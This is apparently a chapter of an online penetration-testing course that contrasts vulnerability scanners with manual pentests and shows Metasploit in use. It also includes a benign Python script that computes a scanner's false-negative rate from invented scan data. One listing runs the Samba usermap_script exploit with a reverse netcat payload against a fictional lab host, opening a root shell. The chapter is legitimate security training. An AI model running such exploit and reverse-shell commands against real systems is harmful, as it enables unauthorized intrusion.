Hacking VI: Vulnerability scanner and penetration testing frameworks
It goes without saying that many processes in a penetration test can and should be automated. We can write scripts, for example, that find web applications within a network. A more complex version of this idea is the vulnerability scanner, which automatically searches an IT system for vulnerabilities. Identifying vulnerabilities is not only the main task of a vulnerability scanner, but also our job as penetration testers. The question, then, is whether a vulnerability scan can be compared to a penetration test and, if not, how the two differ.
A vulnerability scan must be configured and started by a user; after that, the scanner searches for weak points on its own. A penetration test, on the other hand, involves manual test phases, which naturally take much longer. Furthermore, a vulnerability scanner can only identify known vulnerabilities: a weakness must already be described in the scanner's plugin or test database before the scanner can detect it. A pentester, by contrast, can search for new, as yet unknown vulnerabilities or creatively combine several conditions to compromise an IT system. For example, if a web server serves files from a directory that is also writable via an FTP server, an attacker only needs FTP access to upload a PHP file and then execute commands through the web server.
Another difference between vulnerability scanners and pentesters concerns the exploitation of vulnerabilities. At the request of the client, pentesters exploit vulnerabilities to find out how deep an attacker would be able to penetrate the target system. A vulnerability scanner does not go this far: it mostly infers vulnerabilities from version banners and other indirect indicators, so its results can contain false positives. Consequently, every automatically identified vulnerability must be verified manually.
Thus, a penetration test can include a vulnerability scan, but it does much more than that. It should be noted here that tools, and vulnerability scanners in particular, should only be used if their impact on the environment under investigation can be assessed. Otherwise, we are at a loss when a client contacts us about sudden malfunctions in the production system. We should also be aware that we can be hacked ourselves when executing third-party scripts or tools. It is therefore essential to look at the source code, if possible, and to take security precautions such as using isolated systems as a working platform.
There are currently many vulnerability scanners on the market. Two of the best known are Nessus and OpenVAS. Nessus from Tenable Network Security is a commercial scanner that runs on Windows, Linux, Unix and Mac OS X. OpenVAS, by contrast, runs only on Linux, but it is available free of charge as open-source software.
In addition to the vulnerability scanners on the market, Rapid7 maintains its own penetration testing framework: Metasploit. Metasploit essentially provides a collection of exploits that can be adapted to the needs of an attacker or tester through various options. To learn how to use it, Offensive Security designed its own publicly available training course: Metasploit Unleashed (https://www.offensive-security.com/metasploit-unleashed/). The following listing shows how Metasploit can be used to exploit a vulnerability in the file server of Dubius Payment Ltd. and obtain a command shell on it:
~# msfconsole
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 10.247.97.48
RHOST => 10.247.97.48
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 10.20.1.14
LHOST => 10.20.1.14
msf exploit(usermap_script) > set LPORT 4444
LPORT => 4444
msf exploit(usermap_script) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Command shell session 1 opened (10.20.1.14:4444 -> 10.247.97.48:54765)
at Wed Nov 28 13:39:22 +0100 2017
ip addr show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether d6:15:2f:c4:9a:96 brd ff:ff:ff:ff:ff:ff
    inet 10.247.97.48/24 brd 10.247.97.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::d415:2fff:fec4:9a96/64 scope link
       valid_lft forever preferred_lft forever
hostname
ftp01
id
uid=0(root) gid=0(root) groups=0(root)
Remark: The above scenario does not work in the practice lab.
If we want to compare the validity of vulnerability scans with the validity of penetration tests, we must have a clear understanding of the false negative rate (FNR): how many vulnerabilities does a vulnerability scanner fail to report, even though the weakness exists? If you like, you can discover this for yourself by scanning the DMZ network of Dubius Payment with Nessus (7-day trial) or OpenVAS, for example. In your opinion, how many vulnerabilities will a vulnerability scan list? 0, 10, 25 or even more than 50?
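To make the two points above concrete, namely that scanner findings need manual verification and that the FNR is what tells us how much a scan misses, here is an added example in Python. It is not part of the original chapter and not a tool shipped with Nessus, OpenVAS or Metasploit. It parses a constructed XML snippet that is loosely modelled on the .nessus v2 report layout (ReportHost and ReportItem elements) and compares the scanner's findings with a constructed list of manually verified vulnerabilities. All host addresses, ports, plugin IDs, plugin names and the verification results are assumptions invented for the example, not real scan data.

```python
"""Triage scanner findings against the manually verified result of a pentest.

Added example for this chapter, not code from the page or from any scanner.
The XML below is a constructed sample loosely modelled on the .nessus v2
layout; every host, port, plugin ID and plugin name is an assumption.
"""
import xml.etree.ElementTree as ET

# Constructed scanner export (not real scan data).
SCAN_XML = """<NessusClientData_v2>
  <Report name="dmz-example">
    <ReportHost name="10.0.0.1">
      <ReportItem port="445" protocol="tcp" severity="4" pluginID="10001"
                  pluginName="Samba 'username map script' command execution">
        <risk_factor>Critical</risk_factor>
      </ReportItem>
      <ReportItem port="21" protocol="tcp" severity="2" pluginID="10002"
                  pluginName="FTP server allows anonymous login">
        <risk_factor>Medium</risk_factor>
      </ReportItem>
      <ReportItem port="80" protocol="tcp" severity="3" pluginID="10003"
                  pluginName="Outdated web server version (banner-based)">
        <risk_factor>High</risk_factor>
      </ReportItem>
      <ReportItem port="22" protocol="tcp" severity="0" pluginID="10004"
                  pluginName="SSH service detection">
        <risk_factor>None</risk_factor>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

# Constructed ground truth from the (hypothetical) manual test phase:
# (host, port/proto) -> what the pentester actually confirmed.
VERIFIED = {
    ("10.0.0.1", "445/tcp"): "confirmed: command shell via username map script",
    ("10.0.0.1", "21/tcp"): "confirmed: anonymous FTP write into web root, PHP upload",
    ("10.0.0.1", "8080/tcp"): "confirmed: admin console with default credentials",
    # 80/tcp is deliberately absent: the banner is old, but the distribution
    # backported the fix, so the scanner finding is a false positive.
}


def parse_findings(xml_text):
    """Return {(host, 'port/proto'): finding} for every non-informational item."""
    root = ET.fromstring(xml_text)
    findings = {}
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            severity = int(item.get("severity", "0"))
            if severity == 0:
                continue  # severity 0 = informational, not a vulnerability claim
            key = (host.get("name"), f"{item.get('port')}/{item.get('protocol')}")
            findings[key] = {
                "plugin": item.get("pluginName"),
                "severity": severity,
                "risk": (item.findtext("risk_factor") or "").strip(),
            }
    return findings


def worklist(findings):
    """Order findings for manual verification, most severe first."""
    return sorted(findings.items(), key=lambda kv: -kv[1]["severity"])


def compare(findings, verified):
    """Classify scanner output against verified results and compute the FNR.

    FNR = false negatives / all verified vulnerabilities (what the scan missed).
    false_positive_share = false positives / all scanner findings.
    """
    tp = set(findings) & set(verified)
    fp = set(findings) - set(verified)
    fn = set(verified) - set(findings)
    return {
        "tp": sorted(tp),
        "fp": sorted(fp),
        "fn": sorted(fn),
        "fnr": len(fn) / len(verified) if verified else 0.0,
        "false_positive_share": len(fp) / len(findings) if findings else 0.0,
    }


if __name__ == "__main__":
    found = parse_findings(SCAN_XML)
    for key, f in worklist(found):
        print(f"verify {key[0]} {key[1]:>9}  sev={f['severity']}  {f['plugin']}")
    result = compare(found, VERIFIED)
    print("missed by scanner:", result["fn"])
    print("false positives  :", result["fp"])
    print(f"FNR = {result['fnr']:.2f}, false-positive share = "
          f"{result['false_positive_share']:.2f}")
```

In this constructed data set the scanner reports three vulnerabilities, one of which is a false positive, and it misses one of the three confirmed weaknesses entirely, giving an FNR of one third. The point of keeping the comparison in a small function like this is that it can be re-run against each new scanner export during an engagement, so that the verification worklist and the miss rate stay visible rather than being reconstructed from memory at reporting time.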
Pentest Training
Take a look at the pentest training chapters and learn penetration testing:
- Preface
- Introduction
- Legal Framework
- Hacking vs. Penetration Testing
- Classification
- Meaningfulness of Penetration Tests
- Penetration Testing Standards
- The Hacking Guide
- Hacking I: Scanning networks
- Hacking II: Password attacks
- Hacking III: Web application attacks
- Hacking IV: Privilege Escalation
- Hacking V: Tunnelling Techniques
- Hacking VI: Vulnerability scanner and penetration testing frameworks
- Demonstration of a Penetration Test
- Risk Assessment of Identified Vulnerabilities
- Structure of Documentation and Reporting
- Insider stories: Tales from Dubius Payment Ltd.
binsec academy GmbH - Online IT Security Training with Practical Focus
binsec academy GmbH is a provider of online IT security training, offering practical, lab-based courses for professionals. The academy provides hands-on training in areas such as penetration testing and secure software development. Participants gain practical experience through realistic lab environments, including simulations of company networks and applications. Courses are available in multiple programming languages and align with standards like OWASP Top 10 and PCI DSS. Upon successful completion, participants receive certifications such as the Binsec Academy Certified Pentest Professional (BACPP) and Binsec Academy Certified Secure Coding Professional (BACSCP), demonstrating their ability to identify and remediate security vulnerabilities.

binsec GmbH – Experts in Penetration Testing
binsec GmbH is a German IT security company focused on professional penetration testing. With over 10 years of experience, the team conducts in-depth penetration tests on networks, web applications, APIs, and mobile apps. Certified experts systematically identify and document security vulnerabilities to support organizations in improving their security and meeting compliance requirements.